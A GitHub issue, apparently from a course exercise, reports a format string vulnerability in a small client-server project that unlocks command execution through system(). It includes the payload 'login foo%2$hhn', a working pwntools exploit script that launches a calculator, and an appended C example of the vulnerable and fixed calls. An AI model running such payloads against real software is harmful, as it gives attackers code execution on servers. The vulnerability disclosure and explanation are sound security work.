This repository has been archived by the owner on May 29, 2023. It is now read-only.

Format string vulnerability found #8

Open

yannvon opened this issue May 13, 2019 · 1 comment
Labels: True vulnerability (Actual vulnerability in the project), wontfix (This will not be worked on)

Comments


yannvon commented May 13, 2019

Where

// AuthenticationService.cpp: the client-supplied name is used as the format string
snprintf(cname, NAME_MAX_LEN, name.c_str(), 0, &login);

// ping handler: reached once the user's login value is nonzero
if (auth.getUser(socket).getLogin()){
// if user is logged in
system(pinghost.c_str());
}

What

Format string vulnerability
The AuthenticationService class has a method registerUser() that registers a user after the login command by creating a corresponding instance of the User class. This User class has an integer attribute called "login" that does not seem important to the server's functionality, as it is always set to 0. However, as it is passed to a vulnerable snprintf() call on line 17 of AuthenticationService.cpp, this login variable can be changed to an arbitrary value, which in turn can unlock some interesting code behavior. When, after changing this login variable to a nonzero value, a "ping $HOSTNAME" command is executed, the $HOSTNAME value is actually given as a parameter to a system() call, which of course gives full server access to an attacker.

Exploit

1. Start both client and server
2. Perform format string attack by sending "login foo%2$hhn"
3. Profit, by sending "ping xcalc" for example, which opens a calculator.

The format string is such that first at least one character is printed ("foo"); then, as the address of the login variable on the stack is given as the second parameter to the snprintf() function, the current number of characters written so far (3) can be written to that address by using the %n format specifier, with "2$" selecting the second parameter.

The following python code can perform these steps when run from the project root directory:

from pwn import *

# Launch the server, give it a moment to bind, then start the client against it.
server = process('bin/server')
log.info("Waiting 1s to make sure server is up and running")
sleep(1)
client = process(['bin/client', '127.0.0.1', '8080'])

# %2$hhn stores the number of characters printed so far into the byte
# at the second snprintf() argument, which is &login.
format_exploit = b"login a%2$hhn"

log.info("Sending format exploit to server: " + format_exploit.decode())
client.sendline(format_exploit)

# login is now nonzero, so the ping command reaches system()
log.info("Sending ping xcalc")
client.sendline(b"ping xcalc")

log.info("Sleeping 5s to display calculator")
sleep(5)

# Clean up
client.close()
server.close()
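The mechanism described in this issue, as an added example that is not the project's code and is not part of the report: a C stand-in for the vulnerable snprintf() call next to a fixed one, the login gate that the write unlocks, and an assumed allowlist check for the host string that would otherwise reach system(). The function names, NAME_MAX_LEN value and payloads are assumptions; the payload is a variation of the report's ("foo%1$d%2$hhn" references both variadic arguments, so glibc's _FORTIFY_SOURCE check on unused positional arguments does not fire), and it is kept as a string literal so the %n-in-writable-memory check does not apply either. The second payload shows that snprintf()'s size limit truncates the output but not the count %n stores.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define NAME_MAX_LEN 64   /* assumed value; the real constant is not shown in the issue */

/* Stand-in for AuthenticationService::registerUser(): the client-supplied
 * name is passed to snprintf() as the FORMAT, with 0 and &login as the two
 * variadic arguments, as in the issue. Returns the login value the call
 * leaves behind (0 unless the format string wrote to it). */
int register_user_vulnerable(const char *name)
{
    char cname[NAME_MAX_LEN];
    int login = 0;

    /* Attacker-controlled format: %2$hhn stores the number of characters
     * produced so far into the byte at argument 2, which is &login. */
    snprintf(cname, NAME_MAX_LEN, name, 0, &login);
    return login;
}

/* Hardened variant: the name is an argument to a fixed "%s" format, so any
 * conversion specifiers it contains are copied as plain text. */
int register_user_fixed(const char *name)
{
    char cname[NAME_MAX_LEN];
    int login = 0;

    snprintf(cname, NAME_MAX_LEN, "%s", name);
    return login;
}

/* The gate from the issue: ping is allowed only once login is nonzero. */
bool ping_allowed(int login)
{
    return login != 0;
}

/* Assumed hardening for the second half of the chain: a ping target handed
 * to a shell is restricted to hostname characters, so shell metacharacters
 * (';', '|', '`', '$', spaces) never reach system(). Returns true only for
 * a non-empty string of letters, digits, '.' and '-' up to 253 bytes. */
bool host_is_safe(const char *host)
{
    size_t n = strlen(host);
    if (n == 0 || n > 253)
        return false;
    for (size_t i = 0; i < n; i++) {
        char c = host[i];
        bool ok = (c >= 'a' && c <= 'z') || (c >= 'A' && c <= 'Z') ||
                  (c >= '0' && c <= '9') || c == '.' || c == '-';
        if (!ok)
            return false;
    }
    return true;
}

int main(void)
{
    /* Constructed attacker input (not from the issue). Both payloads are
     * string literals: see the lead-in for why that matters under
     * _FORTIFY_SOURCE. Values below assume a little-endian int. */
    const char *payload = "foo%1$d%2$hhn";  /* prints "foo0" -> login = 4 */
    const char *wide    = "%1$200d%2$hhn";  /* 200 chars counted -> login = 200 */

    int login = register_user_vulnerable(payload);
    printf("vulnerable: login=%d ping_allowed=%d\n", login, ping_allowed(login));
    login = register_user_vulnerable(wide);
    printf("vulnerable, width 200: login=%d (truncation does not limit %%n)\n", login);
    login = register_user_fixed(payload);
    printf("fixed: login=%d ping_allowed=%d\n", login, ping_allowed(login));
    printf("host_is_safe(\"xcalc; id\")=%d host_is_safe(\"example.org\")=%d\n",
           host_is_safe("xcalc; id"), host_is_safe("example.org"));
    return 0;
}
```

The fix is the standard one for this bug class: user data is never the format argument. The allowlist is an assumed second layer; since the issue does not show how pinghost is assembled, the better fix there is to drop system() entirely in favour of an exec-style call with a fixed argument vector.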
guillaumemichel (Collaborator) commented

Congrats you found a vulnerability!

@guillaumemichel guillaumemichel added True vulnerability Actual vulnerability in the project wontfix This will not be worked on labels May 19, 2019